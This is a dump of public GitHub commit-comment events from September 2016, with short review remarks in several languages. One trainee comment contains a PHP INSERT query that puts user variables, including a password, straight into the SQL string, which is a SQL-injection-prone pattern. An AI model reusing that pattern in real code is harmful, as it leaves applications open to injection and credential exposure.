{"id":"4612221189","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/zadanie-8.5"},"payload":{"comment":{"id":19157330,"position":null,"line":null,"path":null,"commit_id":"429dde2de8c9cc613a8390d0a4ce003f97a09752","created_at":"2016-09-24T08:57:59Z","updated_at":"2016-09-24T08:57:59Z","body":"chciałam uruchomić w tym projekcie grunt i znowu coś nie tak z Browser Sync (bo chyba to, co pokazuje się tylko w konsoli też powinno się automatycznie odświeżać? - a u mnie tak się nie robi), mógłbyś rzucić okiem? zaczął się tez pokazywać taki komunikat\r\n'//@ sourceURL' and '//@ sourceMappingURL' are deprecated, please use '//# sourceURL=' and '//# sourceMappingURL=' instead."}},"created_at":"2016-09-24T08:57:59Z"}
{"id":"4612222303","type":"CommitCommentEvent","actor":{"login":"tbirand"},"repo":{"name":"EditionGuard/WooCommerce-Plugin"},"payload":{"comment":{"id":19157332,"position":null,"line":null,"path":null,"commit_id":"b3429c9a6d1921d39a8adaa15e2c8651826518aa","created_at":"2016-09-24T08:58:54Z","updated_at":"2016-09-24T08:58:54Z","body":"@vlad0209 Also the old 2.0- method doesn't seem to be saving the links."}},"created_at":"2016-09-24T08:58:54Z"}
{"id":"4612222595","type":"CommitCommentEvent","actor":{"login":"charmasaur"},"repo":{"name":"rabsie/romper-stomper"},"payload":{"comment":{"id":19157335,"position":null,"line":null,"path":null,"commit_id":"c47d578937ee5f4ab1ac2a0ecf9143e4249ecfed","created_at":"2016-09-24T08:59:10Z","updated_at":"2016-09-24T08:59:10Z","body":"Please switch LocationRequest and LocationService."}},"created_at":"2016-09-24T08:59:10Z"}
{"id":"4612222742","type":"CommitCommentEvent","actor":{"login":"Memphiz"},"repo":{"name":"MrMC/pvr.hdhomerun"},"payload":{"comment":{"id":19157336,"position":null,"line":null,"path":null,"commit_id":"405f0b8cc9075aca09850020bc4a44f326fa5576","created_at":"2016-09-24T08:59:20Z","updated_at":"2016-09-24T08:59:20Z","body":"@ksooo fyi"}},"created_at":"2016-09-24T08:59:20Z"}
{"id":"4612227569","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19157340,"position":130,"line":1913,"path":"src/server/game/Entities/Player/Player.cpp","commit_id":"55d2c19f079e9486c1c1f939c61501f53ac42159","created_at":"2016-09-24T09:03:12Z","updated_at":"2016-09-24T09:03:12Z","body":"I did not. It involves adding new configs so I left it for another time."}},"created_at":"2016-09-24T09:03:12Z"}
{"id":"4612232658","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/zadanie-8.5"},"payload":{"comment":{"id":19157347,"position":null,"line":null,"path":null,"commit_id":"429dde2de8c9cc613a8390d0a4ce003f97a09752","created_at":"2016-09-24T09:07:06Z","updated_at":"2016-09-24T09:07:06Z","body":"ale sam projekt poprawiony, więc wysyłam do sprawdzenia"}},"created_at":"2016-09-24T09:07:06Z"}
{"id":"4612233492","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"open-spycat/meta-spycat"},"payload":{"comment":{"id":19157350,"position":null,"line":null,"path":null,"commit_id":"ef66848a65be4630f6855fab871c99cbd8ec2e20","created_at":"2016-09-24T09:07:47Z","updated_at":"2016-09-24T09:07:47Z","body":"Could you please update linux-spycat sums? \r\n\r\n```\r\nSRC_URI[md5sum] = \"3dd88764022a47d16d8366fde7171f59\"\r\nSRC_URI[sha256sum] = \"481d83a00811edbd7e2af8821ebfa87cb570b287a933a6656b9b2087ba9493d3\"\r\n```\r\n"}},"created_at":"2016-09-24T09:07:47Z"}
{"id":"4612236351","type":"CommitCommentEvent","actor":{"login":"Mr-Dai"},"repo":{"name":"Mr-Dai/WeTrack-Backend"},"payload":{"comment":{"id":19157352,"position":null,"line":null,"path":null,"commit_id":"576c6cb00fc68751d289797c4a499f44126f6ace","created_at":"2016-09-24T09:10:01Z","updated_at":"2016-09-24T09:10:01Z","body":"课程项目而已 =。="}},"created_at":"2016-09-24T09:10:01Z"}
{"id":"4612240619","type":"CommitCommentEvent","actor":{"login":"kbraak"},"repo":{"name":"gbif/registry"},"payload":{"comment":{"id":19157353,"position":null,"line":null,"path":null,"commit_id":"f10f6bc304c81ebdf78f5ec63a919b7ba7049f8d","created_at":"2016-09-24T09:13:38Z","updated_at":"2016-09-24T09:13:38Z","body":"@cgendreau I kindly ask for your review of this new method that can be used to create a DataCite metadata document for a custom download. \r\n\r\nThe DataCite metadata document for a custom download is sufficiently different from a normal download to warrant a new method. Below is a list of ways the document for the custom download differs:\r\n* has different title\r\n* sets creator ORCID\r\n* always uses most restrictive license\r\n* uses different relationship type isDerivedFrom\r\n* has different description, notably it appends DOI link for each used dataset\r\n\r\nInstead of reading the set of dataset usages from the database it gets them from a tab file. Other properties such as the DOI and download size are read from a .properties file. It's easy enough to run this from IntelliJ. Or do you think this would be nice to run from a CLI? \r\n\r\nAlso, to be able to reproduce each custom download I'm suggesting we store Jan's custom hive query as this would allow us to rerun the download. Plus I'm suggesting we also store the list of dataset usages as this would also us to regenerate the DataCite metadata document if needed. I'd be interested in your thoughts on these suggestions. \r\n\r\nThanks for the help."}},"created_at":"2016-09-24T09:13:38Z"}
{"id":"4612241451","type":"CommitCommentEvent","actor":{"login":"gayu-mike"},"repo":{"name":"gayu-mike/learnweb"},"payload":{"comment":{"id":19157356,"position":53,"line":250,"path":"routes.py","commit_id":"d78beb09721999be99471bed955ad780870fb527","created_at":"2016-09-24T09:14:22Z","updated_at":"2016-09-24T09:14:22Z","body":"####在 server 的 response_for_path(path) 里实现 url-route 的映射是用 dict.get 做的\r\n####得到 url 对应的 route 函数名后，用 () 调用函数并把 request 参数传进去\r\n`r = {'/static': route_static,}\r\nr.update(route_dict)\r\nresponse = r.get(path, error)`\r\nreturn response(request)\r\n`\r\n\r\n####login_required 实现在调用 route 函数前的逻辑判断\r\n####举个例子：\r\n`login_required(weibo_index)\r\n\treturn wrap\r\n\t\t执行一段判断代码之后\r\n\t\treturn weibo_index\r\n`\t"}},"created_at":"2016-09-24T09:14:22Z"}
{"id":"4612241604","type":"CommitCommentEvent","actor":{"login":"HanYong201308"},"repo":{"name":"HanYong201308/Course-work-of-embedded-system"},"payload":{"comment":{"id":19157357,"position":1,"line":1,"path":"user/main.c","commit_id":"4a0479d356c3b45f7e9f79c47e495ef138009f32","created_at":"2016-09-24T09:14:31Z","updated_at":"2016-09-24T09:14:31Z","body":"jdijioe"}},"created_at":"2016-09-24T09:14:31Z"}
{"id":"4612241614","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157358,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T09:14:31Z","updated_at":"2016-09-24T09:14:31Z","body":"overall comment"}},"created_at":"2016-09-24T09:14:31Z"}
{"id":"4612242034","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157359,"position":31,"line":31,"path":"issue18/regist.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T09:14:56Z","updated_at":"2016-09-24T09:14:56Z","body":"下記のようにプレースホルダを元に戻したらデータが入るようになりましたが、上記何が原因なのでしょうか…。\r\n\r\n$stmt = $pdo -> prepare(\"INSERT INTO users (name, mail, password, created_at) VALUES ('$name', '$mail', '$password', '$timestamp')\");"}},"created_at":"2016-09-24T09:14:56Z"}
{"id":"4612246122","type":"CommitCommentEvent","actor":{"login":"derakhti0041"},"repo":{"name":"Sojerbot/sojer"},"payload":{"comment":{"id":19157363,"position":2,"line":2,"path":"README.md","commit_id":"ddfb7e27a98d38455e0eee0312519ee7e68579b4","created_at":"2016-09-24T09:18:54Z","updated_at":"2016-09-24T09:18:54Z","body":"240474642"}},"created_at":"2016-09-24T09:18:54Z"}
{"id":"4612248674","type":"CommitCommentEvent","actor":{"login":"michaelhou"},"repo":{"name":"benxiaohaimx/hello-world"},"payload":{"comment":{"id":19157364,"position":null,"line":null,"path":null,"commit_id":"f1038ce5bc71c4cbc58c1665578ccc4054330443","created_at":"2016-09-24T09:21:14Z","updated_at":"2016-09-24T09:21:14Z","body":"come, to hurt each other...."}},"created_at":"2016-09-24T09:21:14Z"}
{"id":"4612253985","type":"CommitCommentEvent","actor":{"login":"IngoKresse"},"repo":{"name":"raspberrypi/linux"},"payload":{"comment":{"id":19157366,"position":null,"line":null,"path":null,"commit_id":"95cb7e4de59547506de4b669448e11381ec4abfe","created_at":"2016-09-24T09:26:12Z","updated_at":"2016-09-24T09:26:12Z","body":"(sorry for the late reply, I was on vacations).\n\nGood to hear that I was not the only one having issues with this driver.\n\nI think this sense-flipping heuristic was supposed to fix the driver\nbehaviour if the initial auto-detection got the wrong result. I guess\nthe original author wanted to limit the time for the initial auto-detection.\n\nI agree that it is more likely to cause trouble - and even if it does\nhelp and correct the auto-sense setting, it would only do so after 15\nseconds of silence - Kodi may well be running before and the user will\nbe pressing buttons on the remote control...\n\nI'm not sure if the normal auto-detection is that bad -- at least in the\nIR protocols RC5 and NEC, the codes repeat every 108ms or 114ms with at\nleast 89ms pause. And a sample hitting a data word has a chance of 50%\nor higher to see a space.\n\nSo with (at most) a single remote control sending a signal, the current\nheuristic should have a pretty good chance. If necessary, we can try and\nmake it more robust by sampling 91 times every 4ms instead of only 9\ntimes every 40 ms.\n\nThis would mean undoing my patch, removing line 280 and (if necessary)\nadjusting the values 9 and 40 near lines 405 and 410.\n\nI'd be in favor of this change, it makes things simpler.\n\nCheers,\nIngo\n"}},"created_at":"2016-09-24T09:26:12Z"}
{"id":"4612255625","type":"CommitCommentEvent","actor":{"login":"huangkerui"},"repo":{"name":"huangkerui/react-basics"},"payload":{"comment":{"id":19157367,"position":null,"line":null,"path":null,"commit_id":"cc678562c8262571a91db401246012755fe9dbb2","created_at":"2016-09-24T09:27:47Z","updated_at":"2016-09-24T09:27:47Z","body":"So that we can run `npm run dev` (which will run the `dev` command in `scripts`) to start the dev-server. Just like an alias of directly running `webpack-dev-server --content-base src`."}},"created_at":"2016-09-24T09:27:47Z"}
{"id":"4612257594","type":"CommitCommentEvent","actor":{"login":"esbrandt"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":19157371,"position":null,"line":null,"path":null,"commit_id":"bac0ff9fd4138dd89d623935f3b3e36c22226bd4","created_at":"2016-09-24T09:29:40Z","updated_at":"2016-09-24T09:29:40Z","body":"Thanks, works again.\nPossible some caching issues after OS upgrade.\n\n> On Sep 19, 2016, at 00:03, Be <notifications@github.com> wrote:\n> \n> Did it work?\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/mixxxdj/mixxx/commit/bac0ff9fd4138dd89d623935f3b3e36c22226bd4#commitcomment-19072410>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AEUPSbIQi0MXnZgaawAow-wgoohmsd7Lks5qrbUagaJpZM4J_uQU>.\n> \n\n"}},"created_at":"2016-09-24T09:29:40Z"}
{"id":"4612260998","type":"CommitCommentEvent","actor":{"login":"VorobiovKir"},"repo":{"name":"ukrgerri4/beastmaster"},"payload":{"comment":{"id":19157376,"position":3,"line":3,"path":"first task","commit_id":"681d449b0819ecdc321aa683823f7808c8bfc596","created_at":"2016-09-24T09:32:35Z","updated_at":"2016-09-24T09:32:35Z","body":"в Хеде хранится только та информация, которая не отображается (скрипты, ссылки, мета информация)"}},"created_at":"2016-09-24T09:32:35Z"}
{"id":"4612261400","type":"CommitCommentEvent","actor":{"login":"VorobiovKir"},"repo":{"name":"ukrgerri4/beastmaster"},"payload":{"comment":{"id":19157378,"position":3,"line":3,"path":"first task","commit_id":"681d449b0819ecdc321aa683823f7808c8bfc596","created_at":"2016-09-24T09:32:58Z","updated_at":"2016-09-24T09:32:58Z","body":"title тут не место"}},"created_at":"2016-09-24T09:32:58Z"}
{"id":"4612261740","type":"CommitCommentEvent","actor":{"login":"VorobiovKir"},"repo":{"name":"ukrgerri4/beastmaster"},"payload":{"comment":{"id":19157379,"position":4,"line":4,"path":"first task","commit_id":"681d449b0819ecdc321aa683823f7808c8bfc596","created_at":"2016-09-24T09:33:18Z","updated_at":"2016-09-24T09:33:18Z","body":"title тут не место"}},"created_at":"2016-09-24T09:33:18Z"}
{"id":"4612263054","type":"CommitCommentEvent","actor":{"login":"kYroL01"},"repo":{"name":"ntop/nDPI"},"payload":{"comment":{"id":19157382,"position":null,"line":null,"path":null,"commit_id":"054f8376e4ad7086c9a51e032f75160c1c30e65e","created_at":"2016-09-24T09:34:26Z","updated_at":"2016-09-24T09:34:26Z","body":"For meebo read this: http://www.meebo.com/"}},"created_at":"2016-09-24T09:34:26Z"}
{"id":"4612263461","type":"CommitCommentEvent","actor":{"login":"VorobiovKir"},"repo":{"name":"ukrgerri4/beastmaster"},"payload":{"comment":{"id":19157383,"position":8,"line":8,"path":"first task","commit_id":"681d449b0819ecdc321aa683823f7808c8bfc596","created_at":"2016-09-24T09:34:49Z","updated_at":"2016-09-24T09:34:49Z","body":"для таблиц лучше использовать thead, tbody\r\nЕсли делать как ты сделал - то тег th - это для заголовков, для остального используется td\r\n"}},"created_at":"2016-09-24T09:34:49Z"}
{"id":"4612265297","type":"CommitCommentEvent","actor":{"login":"VorobiovKir"},"repo":{"name":"ukrgerri4/beastmaster"},"payload":{"comment":{"id":19157388,"position":8,"line":8,"path":"first task","commit_id":"681d449b0819ecdc321aa683823f7808c8bfc596","created_at":"2016-09-24T09:36:25Z","updated_at":"2016-09-24T09:36:25Z","body":"Примерная структура должна быть:\r\ntable\r\n thead\r\n  tr\r\n   th\r\n tbody\r\n  tr\r\n   td"}},"created_at":"2016-09-24T09:36:25Z"}
{"id":"4612267294","type":"CommitCommentEvent","actor":{"login":"VorobiovKir"},"repo":{"name":"ukrgerri4/beastmaster"},"payload":{"comment":{"id":19157389,"position":null,"line":null,"path":null,"commit_id":"681d449b0819ecdc321aa683823f7808c8bfc596","created_at":"2016-09-24T09:38:17Z","updated_at":"2016-09-24T09:38:17Z","body":"1. Переделай таблицу\r\n2. Разберись с Git\r\n3. команды gita которые нужны тебе в первое время: git clone, git pull, git push, git add, git commit"}},"created_at":"2016-09-24T09:38:17Z"}
{"id":"4612269364","type":"CommitCommentEvent","actor":{"login":"janlelis"},"repo":{"name":"janlelis/idiosyncratic-ruby.com"},"payload":{"comment":{"id":19157390,"position":68,"line":68,"path":"source/posts/54-try-converting.html.md","commit_id":"98e8de49193e1f636d90431b2374c09ca0de4da7","created_at":"2016-09-24T09:40:10Z","updated_at":"2016-09-24T09:40:10Z","body":"Thanks!"}},"created_at":"2016-09-24T09:40:10Z"}
{"id":"4612270841","type":"CommitCommentEvent","actor":{"login":"FooDeas"},"repo":{"name":"FooDeas/raspberrypi-ua-netinst"},"payload":{"comment":{"id":19157391,"position":null,"line":null,"path":null,"commit_id":"9cfe0c6bc88fe1ce8b713797eae6f4891a43f0b1","created_at":"2016-09-24T09:41:15Z","updated_at":"2016-09-24T09:41:15Z","body":"👍"}},"created_at":"2016-09-24T09:41:15Z"}
{"id":"4612272817","type":"CommitCommentEvent","actor":{"login":"lukeIam"},"repo":{"name":"lukeIam/cgeo"},"payload":{"comment":{"id":19157397,"position":null,"line":null,"path":null,"commit_id":"60e32b74bd702eb4a258912ba67ef74a04e01ae2","created_at":"2016-09-24T09:42:55Z","updated_at":"2016-09-24T09:42:55Z","body":"I haven't found a way to figure out when navigation starts/ends (and works for all maps).\r\nIf you point me to the right events, I'll move the code."}},"created_at":"2016-09-24T09:42:55Z"}
{"id":"4612273609","type":"CommitCommentEvent","actor":{"login":"VorobiovKir"},"repo":{"name":"ukrgerri4/beastmaster"},"payload":{"comment":{"id":19157399,"position":null,"line":null,"path":null,"commit_id":"63aabd46e10d5832dd258c87f447a7e425dcecbb","created_at":"2016-09-24T09:43:38Z","updated_at":"2016-09-24T09:43:38Z","body":"Да, сервер (удаленный компьютер) который постоянно работает, и в нем прописаны правила - \"при каких события, что делать\"\r\nКлиент - пользователи, которые генерируют события на сервере, получая что-то в ответ"}},"created_at":"2016-09-24T09:43:38Z"}
{"id":"4612274523","type":"CommitCommentEvent","actor":{"login":"ZuoCaiSong"},"repo":{"name":"ltebean/LTNavigationBar"},"payload":{"comment":{"id":19157400,"position":null,"line":null,"path":null,"commit_id":"5db4c033ab89b174d58640fe4fcfacfd689f8201","created_at":"2016-09-24T09:44:28Z","updated_at":"2016-09-24T09:44:28Z","body":"- (void)lt_setBackgroundColor:(UIColor *)backgroundColor\r\n{\r\n    if (!self.overlay) {\r\n        [self setBackgroundImage:[UIImage new] forBarMetrics:UIBarMetricsDefault];\r\n        self.overlay = [[UIView alloc] initWithFrame:CGRectMake(0, 0, CGRectGetWidth(self.bounds), CGRectGetHeight(self.bounds) + 20)];\r\n        self.overlay.userInteractionEnabled = NO;\r\n        self.overlay.autoresizingMask = UIViewAutoresizingFlexibleWidth;    // Should not set `UIViewAutoresizingFlexibleHeight`\r\n        [[self.subviews firstObject] insertSubview:self.overlay atIndex:0];\r\n    }\r\n    self.overlay.backgroundColor = backgroundColor;\r\n}"}},"created_at":"2016-09-24T09:44:28Z"}
{"id":"4612274812","type":"CommitCommentEvent","actor":{"login":"ZuoCaiSong"},"repo":{"name":"ltebean/LTNavigationBar"},"payload":{"comment":{"id":19157401,"position":null,"line":null,"path":null,"commit_id":"5db4c033ab89b174d58640fe4fcfacfd689f8201","created_at":"2016-09-24T09:44:46Z","updated_at":"2016-09-24T09:44:46Z","body":"用这个可以解决"}},"created_at":"2016-09-24T09:44:46Z"}
{"id":"4612275335","type":"CommitCommentEvent","actor":{"login":"TheMightyBuzzard"},"repo":{"name":"SoylentNews/rehash"},"payload":{"comment":{"id":19157403,"position":null,"line":null,"path":null,"commit_id":"2a8ae063294ed6769b5701a071d895c8759638db","created_at":"2016-09-24T09:45:10Z","updated_at":"2016-09-24T09:45:10Z","body":"Really should have a look at the current config before you go jumping into that."}},"created_at":"2016-09-24T09:45:10Z"}
{"id":"4612275940","type":"CommitCommentEvent","actor":{"login":"yoshuawuyts"},"repo":{"name":"yoshuawuyts/server-router"},"payload":{"comment":{"id":19157404,"position":82,"line":59,"path":"index.js","commit_id":"4484e1a8cd3af805259308ca72f37e6f71366d0a","created_at":"2016-09-24T09:45:42Z","updated_at":"2016-09-24T09:45:42Z","body":":( - PR welcome?"}},"created_at":"2016-09-24T09:45:42Z"}
{"id":"4612276588","type":"CommitCommentEvent","actor":{"login":"briansmith"},"repo":{"name":"briansmith/ring"},"payload":{"comment":{"id":19157406,"position":null,"line":null,"path":null,"commit_id":"7d18737eef256d63fc930a8a18949c65efea3b76","created_at":"2016-09-24T09:46:20Z","updated_at":"2016-09-24T09:46:20Z","body":"> Was the addition of the libssh submodule here intentional?\r\n\r\nNo, it sure wasn't! And, because of licensing reasons, I had to strip it from the repo completely. Sorry for this inconvenience."}},"created_at":"2016-09-24T09:46:20Z"}
{"id":"4612276619","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"grapherd/phonebook-1"},"payload":{"comment":{"id":19157407,"position":null,"line":null,"path":null,"commit_id":"4a9b75244ff8bcb2ab1c7822a37f4cf6e080f36a","created_at":"2016-09-24T09:46:23Z","updated_at":"2016-09-24T09:46:23Z","body":"Don't mention filename in the subject of GIT commit messages unless you made build system specific changes. "}},"created_at":"2016-09-24T09:46:23Z"}
{"id":"4612277057","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"grapherd/phonebook-1"},"payload":{"comment":{"id":19157408,"position":26,"line":33,"path":"phonebook_opt.h","commit_id":"4a9b75244ff8bcb2ab1c7822a37f4cf6e080f36a","created_at":"2016-09-24T09:46:48Z","updated_at":"2016-09-24T09:46:48Z","body":"Why did you change `lastName`?"}},"created_at":"2016-09-24T09:46:48Z"}
{"id":"4612277225","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19157409,"position":null,"line":null,"path":null,"commit_id":"23cc79992f5e7624b79f3c696fb4a674ad51bae9","created_at":"2016-09-24T09:46:57Z","updated_at":"2016-09-24T09:46:57Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create views for mkonnect in the admin dashboard based on job category](https://trello.com/c/kAxiffro/26-create-views-for-mkonnect-in-the-admin-dashboard-based-on-job-category)"}},"created_at":"2016-09-24T09:46:57Z"}
{"id":"4612277445","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19157411,"position":null,"line":null,"path":null,"commit_id":"c4fbfa69d1d654df685add77430c54995916c296","created_at":"2016-09-24T09:47:09Z","updated_at":"2016-09-24T09:47:09Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create views for mkonnect in the admin dashboard based on job category](https://trello.com/c/kAxiffro/26-create-views-for-mkonnect-in-the-admin-dashboard-based-on-job-category)"}},"created_at":"2016-09-24T09:47:09Z"}
{"id":"4612277726","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19157412,"position":null,"line":null,"path":null,"commit_id":"a3ac07dae5b74a576cc17a142a1949c94a8edc6b","created_at":"2016-09-24T09:47:24Z","updated_at":"2016-09-24T09:47:24Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create views for mkonnect in the admin dashboard based on job category](https://trello.com/c/kAxiffro/26-create-views-for-mkonnect-in-the-admin-dashboard-based-on-job-category)"}},"created_at":"2016-09-24T09:47:24Z"}
{"id":"4612278149","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19157414,"position":null,"line":null,"path":null,"commit_id":"abefa55eea654f0d32f434061d88a899d3e227ca","created_at":"2016-09-24T09:47:49Z","updated_at":"2016-09-24T09:47:49Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [create views for mkonnect in the admin dashboard based on job category](https://trello.com/c/kAxiffro/26-create-views-for-mkonnect-in-the-admin-dashboard-based-on-job-category)"}},"created_at":"2016-09-24T09:47:49Z"}
{"id":"4612279152","type":"CommitCommentEvent","actor":{"login":"Crotalus"},"repo":{"name":"FAForever/fa"},"payload":{"comment":{"id":19157419,"position":null,"line":null,"path":null,"commit_id":"6c9e19883f378ae3993c07acf816813e49486615","created_at":"2016-09-24T09:48:39Z","updated_at":"2016-09-24T09:48:39Z","body":"It prevent a player from pinging something, it was implemented as a global lock so if a player on the enemy team pings something you cannot ping yourself until it unlocks. That's why pings sometime just disappear even though you haven't seen a visible ping somewhere right before.\r\n\r\nWould be better with a timeout per player.\r\n"}},"created_at":"2016-09-24T09:48:39Z"}
{"id":"4612281544","type":"CommitCommentEvent","actor":{"login":"Crotalus"},"repo":{"name":"FAForever/fa"},"payload":{"comment":{"id":19157421,"position":39,"line":59,"path":"lua/SimPing.lua","commit_id":"df7216d39f3dc6dc5aeeab231b4c8b6cbbbfcec1","created_at":"2016-09-24T09:50:53Z","updated_at":"2016-09-24T09:50:53Z","body":"Yep, that seems like a good idea"}},"created_at":"2016-09-24T09:50:53Z"}
{"id":"4612283446","type":"CommitCommentEvent","actor":{"login":"lefebv-z"},"repo":{"name":"WorldsParticle/IrrlichtPrototype"},"payload":{"comment":{"id":19157422,"position":12,"line":14,"path":"src/TerrainModule.cpp","commit_id":"2707f4c608d5de4579abe80a17d9970e95eed470","created_at":"2016-09-24T09:52:36Z","updated_at":"2016-09-24T09:52:36Z","body":"fais attention a tes settings d'indentation stp"}},"created_at":"2016-09-24T09:52:36Z"}
{"id":"4612286393","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"jorendorff/rust-grammar"},"payload":{"comment":{"id":19157426,"position":10,"line":10,"path":"Rust.g4","commit_id":"a17023dc6bd2a4632314eb693816525650c14cf8","created_at":"2016-09-24T09:55:10Z","updated_at":"2016-09-24T09:55:10Z","body":"Hey, good news, this was fixed somewhere! At least, \r\n\r\n```\r\nfn foo() {}\r\n\r\nfn main() { self :: foo() }\r\n```\r\n\r\ncompiles with `1.11.0` and does not compile with `1.4.0`."}},"created_at":"2016-09-24T09:55:10Z"}
{"id":"4612288835","type":"CommitCommentEvent","actor":{"login":"Super-Baleine"},"repo":{"name":"muonium/core"},"payload":{"comment":{"id":19157429,"position":null,"line":null,"path":null,"commit_id":"1560f2eef26ba346f659b55fcd607fc33dc91a97","created_at":"2016-09-24T09:57:19Z","updated_at":"2016-09-24T09:57:19Z","body":"Because SJCL doesn't support worker."}},"created_at":"2016-09-24T09:57:19Z"}
{"id":"4612288870","type":"CommitCommentEvent","actor":{"login":"ketul-shah"},"repo":{"name":"ketul-shah/hello-world"},"payload":{"comment":{"id":19157430,"position":null,"line":null,"path":null,"commit_id":"6445da20472b022815282c74961f13142d8a88cd","created_at":"2016-09-24T09:57:21Z","updated_at":"2016-09-24T09:57:21Z","body":"this branch was created when i was learning android dev. useless now."}},"created_at":"2016-09-24T09:57:21Z"}
{"id":"4612289462","type":"CommitCommentEvent","actor":{"login":"Crotalus"},"repo":{"name":"FAForever/fa"},"payload":{"comment":{"id":19157433,"position":7,"line":7,"path":"lua/sim/tasks/GiveTask.lua","commit_id":"a7c99a2b2e9113e249b097dbff665ac09d7ef821","created_at":"2016-09-24T09:57:59Z","updated_at":"2016-09-24T09:57:59Z","body":"You're right, the one embedded in the class is not used, updating."}},"created_at":"2016-09-24T09:57:59Z"}
{"id":"4612290579","type":"CommitCommentEvent","actor":{"login":"lefebv-z"},"repo":{"name":"WorldsParticle/IrrlichtPrototype"},"payload":{"comment":{"id":19157435,"position":1,"line":1,"path":"include/noise/simplexnoise.hpp","commit_id":"2707f4c608d5de4579abe80a17d9970e95eed470","created_at":"2016-09-24T09:58:47Z","updated_at":"2016-09-24T09:58:47Z","body":"tous les fichiers externes doivent etre deplaces dans le dossier lib (c'est a dire: de la meme maniere que RealisticWater)"}},"created_at":"2016-09-24T09:58:47Z"}
{"id":"4612291467","type":"CommitCommentEvent","actor":{"login":"monibu1548"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19157437,"position":48,"line":33,"path":"sensor.py","commit_id":"44e26d1695b5cfcd73d10aeb8d1f91614c8d1694","created_at":"2016-09-24T09:59:27Z","updated_at":"2016-09-24T09:59:27Z","body":"이 부분의 위치는 뭐죠..?\r\n\r\n함수에 속하는 부분이 아닙니다\r\n\r\n외부에서  python sensor.py 하면 이부분이 실행돼버릴거같아요\r\n\r\n그리고 모든 함수의 첫번째 전달인자는 self 이어야합니다.\r\n\r\n점프투 파이썬에사 파이썬 모듈 부분 확인해주세요"}},"created_at":"2016-09-24T09:59:27Z"}
{"id":"4613384666","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161375,"position":null,"line":null,"path":null,"commit_id":"422d4acb4cc18ff983752163cbed8e4ceb10c2be","created_at":"2016-09-25T00:01:16Z","updated_at":"2016-09-25T00:01:16Z","body":"@KairusDarkSeeker You just need to use `setSkin($skindata, $skinID);`\r\nThe capes are just a skinID."}},"created_at":"2016-09-25T00:01:16Z"}
{"id":"4613384697","type":"CommitCommentEvent","actor":{"login":"PauloRenato4"},"repo":{"name":"PauloRenato4/Tatita-Veiculos-Ltda"},"payload":{"comment":{"id":19161376,"position":null,"line":null,"path":null,"commit_id":"2df0d4c7fb467fbd00cc3d151cec84f36be33eb0","created_at":"2016-09-25T00:01:19Z","updated_at":"2016-09-25T00:01:19Z","body":"simples merge para teste"}},"created_at":"2016-09-25T00:01:19Z"}
{"id":"4613385829","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161377,"position":null,"line":null,"path":null,"commit_id":"422d4acb4cc18ff983752163cbed8e4ceb10c2be","created_at":"2016-09-25T00:02:16Z","updated_at":"2016-09-25T00:02:16Z","body":"I know"}},"created_at":"2016-09-25T00:02:16Z"}
{"id":"4613386352","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161380,"position":null,"line":null,"path":null,"commit_id":"422d4acb4cc18ff983752163cbed8e4ceb10c2be","created_at":"2016-09-25T00:02:39Z","updated_at":"2016-09-25T00:02:39Z","body":"Instead of chatting here, reply to Gitter"}},"created_at":"2016-09-25T00:02:39Z"}
{"id":"4613387169","type":"CommitCommentEvent","actor":{"login":"MarinaZvyagina"},"repo":{"name":"MarinaZvyagina/timeTable"},"payload":{"comment":{"id":19161381,"position":null,"line":null,"path":null,"commit_id":"393e9f9ec3401a8b33e0a8fea912ef85886bff75","created_at":"2016-09-25T00:03:20Z","updated_at":"2016-09-25T00:03:20Z","body":"cities*"}},"created_at":"2016-09-25T00:03:20Z"}
{"id":"4613388489","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161383,"position":null,"line":null,"path":null,"commit_id":"e99dae63e50240c3e4b89b275fc2e5250136aca9","created_at":"2016-09-25T00:04:34Z","updated_at":"2016-09-25T00:04:34Z","body":"Well it actually already was op only lol but that could be better"}},"created_at":"2016-09-25T00:04:34Z"}
